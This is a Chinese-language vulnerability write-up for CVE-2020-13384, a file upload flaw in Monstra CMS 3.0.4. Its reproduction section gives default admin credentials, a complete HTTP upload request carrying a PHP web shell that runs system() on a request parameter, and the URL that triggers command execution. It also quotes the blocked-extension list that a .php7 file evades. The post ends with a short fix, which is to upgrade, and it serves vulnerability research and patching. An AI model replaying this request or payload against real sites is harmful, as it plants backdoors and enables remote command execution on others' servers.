monstra 文件上传（CVE-2020-13384）

news/2024/11/15 13:44:20/

monstra 文件上传（CVE-2020-13384）

monstra 文件上传（CVE-2020-13384）
- 0x01 漏洞描述
- 0x02 影响范围
- 0x03 漏洞复现
- 0x04 漏洞修复

所有文章，仅供安全研究与学习之用，后果自负!

monstra 文件上传（CVE-2020-13384）

MonstraCMS是一套基于PHP与XML的现代化的轻量级内容管理系统，整套系统无需使用数据库，据说是一家乌克兰的公司开发的。

0x01 漏洞描述

Monstra CMS 3.0.4版本中存在着一处安全漏洞，该漏洞源于程序没有正确验证文件扩展名。攻击者可以上传特殊后缀的文件执行任意PHP代码。账户名密码：admin/123456

该程序不允许’html’, ‘htm’, ‘js’, ‘jsb’, ‘mhtml’, ‘mht’, ‘php’, ‘phtml’, ‘php3’, ‘php4’, ‘php5’, ‘phps’,‘shtml’, ‘jhtml’, ‘pl’, ‘py’, ‘cgi’, ‘sh’, ‘ksh’, ‘bsh’, ‘c’, ‘htaccess’, ‘htpasswd’,‘exe’, ‘scr’, ‘dll’, ‘msi’, ‘vbs’, ‘bat’, ‘com’, ‘pif’, ‘cmd’, ‘vxd’, ‘cpl’,'empty’后缀的文件上传

poc

https://www.exploit-db.com/exploits/48479

在这里插入图片描述

0x02 影响范围

3.0.4

0x03 漏洞复现

Goto: http://192.168.2.5/monstra/admin/index.php?id=filesmanager&path=uploads/
Upload a one liner shell with php7 extenstion ie: shell.php7

请求包内容如下

POST /monstra/admin/index.php?id=filesmanager HTTP/1.1
Host: 192.168.2.5
Content-Length: 548
Cache-Control: max-age=0
Origin: http://192.168.2.5
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarytRfyCkYq8NvztDBf
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.2.5/monstra/admin/index.php?id=filesmanager
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en;q=0.9,en-US;q=0.8,fr;q=0.7
Cookie: PHPSESSID=eej6e0lqi191k2frqc2hl3v6d0; _ga=GA1.1.405623579.1579949328; _gid=GA1.1.2042923722.1579949328
Connection: close------WebKitFormBoundarytRfyCkYq8NvztDBf
Content-Disposition: form-data; name="csrf"2e6ae2353998caa319aae262b113c6b3f17a9636
------WebKitFormBoundarytRfyCkYq8NvztDBf
Content-Disposition: form-data; name="file"; filename="shell.php7"
Content-Type: application/octet-stream<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>------WebKitFormBoundarytRfyCkYq8NvztDBf
Content-Disposition: form-data; name="upload_file"Upload
------WebKitFormBoundarytRfyCkYq8NvztDBf--

trigger your shell by visiting http://192.168.2.5/monstra/public/uploads/shell.php7?cmd=id

0x04 漏洞修复

升级至最新版本\

参考

https://www.exploit-db.com/exploits/48479
https://xz.aliyun.com/t/7850